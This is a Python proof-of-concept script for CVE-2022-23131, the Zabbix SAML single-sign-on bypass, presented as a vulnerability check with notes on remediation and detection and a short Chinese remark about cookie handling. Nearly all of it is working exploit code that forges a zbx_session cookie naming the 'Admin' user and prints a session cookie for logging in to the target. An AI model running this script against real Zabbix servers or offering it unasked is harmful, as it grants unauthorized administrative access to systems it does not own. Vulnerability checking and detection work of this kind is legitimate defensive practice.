Poc_CVE-2022-23131
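"""Check script for CVE-2022-23131 (Zabbix ``zbx_session`` cookie, SSO entry point).

What the script does, as visible in the code below:

1. Fetches ``http://<target>/zabbix`` and reads the ``zbx_session`` cookie the
   server issues to an unauthenticated client.
2. Decodes that cookie (URL-unquote -> base64 -> JSON), keeps its
   ``sessionid`` and ``sign`` values unchanged, and adds a client-chosen
   ``saml_data.username_attribute`` field.
3. Sends the re-encoded cookie to ``/index_sso.php?form=default`` and looks
   for a marker string in the response body.

Why this matters for defenders: ``sign`` is reused unmodified while the cookie
content changes. A server that accepts the cookie is therefore not validating
``sign`` against the full cookie content before ``index_sso.php`` trusts
``saml_data``; session state held by the client is being treated as trusted.

Practical notes:
* Remediation is upgrading Zabbix to a release the vendor lists as fixed for
  this CVE. NOTE(review): the issue is reported to apply only when SAML
  authentication is enabled -- confirm against the vendor advisory.
* Requests to ``/index_sso.php`` whose ``zbx_session`` cookie decodes to JSON
  containing ``saml_data``, without a preceding exchange with the identity
  provider, are the pattern this script produces. Cookie values are usually
  absent from access logs, so this presumably needs proxy/WAF inspection.
* On a positive result the script prints a cookie value that acts as a live
  session credential; handle the output accordingly.
"""
import argparse
import base64
import json
import re
import urllib.parse

# Upper bound, in seconds, for each HTTP request so a silent host cannot hang
# the script indefinitely.
REQUEST_TIMEOUT = 10


def decode(para):
    """Decode a ``zbx_session`` cookie value into the parsed JSON object.

    Args:
        para: Cookie value as received: URL-quoted, base64-encoded JSON text.

    Returns:
        The object produced by ``json.loads`` on the decoded bytes.

    Raises:
        binascii.Error / ValueError: if the value is not valid base64 or JSON.
    """
    para = urllib.parse.unquote(para, encoding="utf-8")
    base64_decode = base64.b64decode(para)
    para_json = json.loads(base64_decode)
    return para_json


def verify(url, payload):
    """Send *payload* as the ``zbx_session`` cookie and report the outcome.

    Args:
        url: Base URL of the Zabbix frontend; ``/index_sso.php?form=default``
            is appended to it.
        payload: Encoded cookie value to send.

    The verdict is a heuristic: it only checks whether the response body
    contains the substring ``icon-monitoring``. A page that happens to contain
    that string, or a frontend whose markup differs, gives a wrong answer.
    """
    # Imported here so decode() and the -h output work without the HTTP
    # dependency installed.
    import requests

    url = url + '/index_sso.php?form=default'
    cookie = payload
    cookies = {'zbx_session': payload}
    # verify=False disables TLS certificate validation, so the identity of the
    # responding host is not checked.
    res = requests.get(url=url, cookies=cookies, verify=False,
                       timeout=REQUEST_TIMEOUT)
    # Named `marker` (the original reused the name `re`, shadowing the module).
    marker = 'icon-monitoring'
    flag = marker in str(res.text)

    if flag:
        print("It looks likely vulnerable")
        # The value printed here is a usable session cookie: treat it as a
        # credential (keep it out of tickets, chat and shared logs).
        print("And please use this cookie " + '{\33[91m' + cookie + '\33[0m}' + " to login zabbix~")
    else:
        print("It is strong")


def exploit(url):
    """Run the check against one target given as ``ip:port``.

    Args:
        url: Host and port; ``http://`` is prepended and ``/zabbix`` appended.

    Prints a message and returns without calling ``verify`` when the response
    carries no ``zbx_session`` cookie (the original raised a TypeError or
    IndexError traceback in that case).
    """
    import requests

    url = 'http://' + url + '/zabbix'
    response = requests.get(url=url, verify=False, timeout=REQUEST_TIMEOUT)
    cookie = response.headers.get('Set-Cookie')
    # The pattern requires a ';' after the value, as in the original.
    found = re.findall('zbx_session=(.*?);', cookie) if cookie else []
    if not found:
        print("No zbx_session cookie in the response; nothing to check")
        return
    para = decode(found[0])
    # sessionid and sign are copied verbatim from the server-issued cookie;
    # only the saml_data field is new. Acceptance by the server shows `sign`
    # is not being checked against the whole cookie.
    payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":' + '"' + para['sessionid'] + '"' + ',"sign":' + '"' + para['sign'] + '"' + '}'
    payload_encode = urllib.parse.quote(base64.b64encode(payload.encode()))
    verify(url, payload_encode)


if __name__ == '__main__':
    # Description corrected to the CVE named in the page title; the original
    # string said CVE-2022-22965.
    parameter = argparse.ArgumentParser(description='Poc CVE-2022-23131:')
    # -file is accepted but not used anywhere in this script.
    parameter.add_argument('-file', help='url file', required=False)
    parameter.add_argument('-url', help='ip:port', required=False)
    para = parameter.parse_args()

    if para.url:
        exploit(para.url)
    else:
        parameter.print_help()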
之前直接使用cookie使用习惯了,忘记了这里cookie应该是dict类型……痛心疾首写在这里,警示一下粗心的chou毛病~